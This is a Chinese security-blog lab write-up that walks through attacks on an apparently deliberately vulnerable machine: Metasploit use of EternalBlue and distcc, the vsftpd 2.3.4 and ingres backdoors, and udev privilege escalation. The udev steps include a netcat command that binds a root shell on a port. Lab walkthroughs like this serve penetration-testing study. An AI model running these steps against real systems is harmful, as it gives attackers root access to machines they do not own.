freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day13-漏洞复现
2020-11-17 09:30:51

漏洞复现

1. 永恒之蓝(445端口)

首先先搜索ms17_010

wps186

use 2   选择编号二的

wps187

查看需要的参数

wps188

设置目标ip地址

wps189

run   启动攻击成功

wps190

2. 手动微笑漏洞(21端口 vsftpd2.3.4版本)

扫描到对方打开21号端口并且版本为vsftpd 2.3.4的

wps191

ftp跟上目标机的ip地址,帐号为root:)  密码为root , 他就会停在那边

(或者search vsftpd直接利用漏洞)

wps192

重新开个终端用nc连接该ip地址的6200端口(成功连接,并且是root权限)

wps193

3. ingres数据库DBMS后门(1524端口)

扫描端口发现有1524端口的开放

wps194

直接telnet进行连接该ip的1524端口(直接获得root用户权限)

wps195


4. distcc漏洞(3632)

msf搜索distcc,并进入该模块

查看所要参数,并设置目标ip

wps197

启用失败(跟环境有关,靶机需要开启3632端口)

wps198

5. udev提权

searchsploit udev  +  locate        搜索加定位

wps199

进入shell

cat /proc/net/netlink -->记录udev pid

wps200

切换到/tmp文件下

wps201

touch run

echo '#!/bin/bash'> run

echo '/bin/netcat -Ivvp 4445 -e /bin/bash' >> run

wps202

将文件移动到/var/www/html文件夹下

wps203

下载并且编译gcc udev.c -0 udev

wps204

./udev pid

wps205

连接成功

wps206

# 内网渗透 # 漏洞复现
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者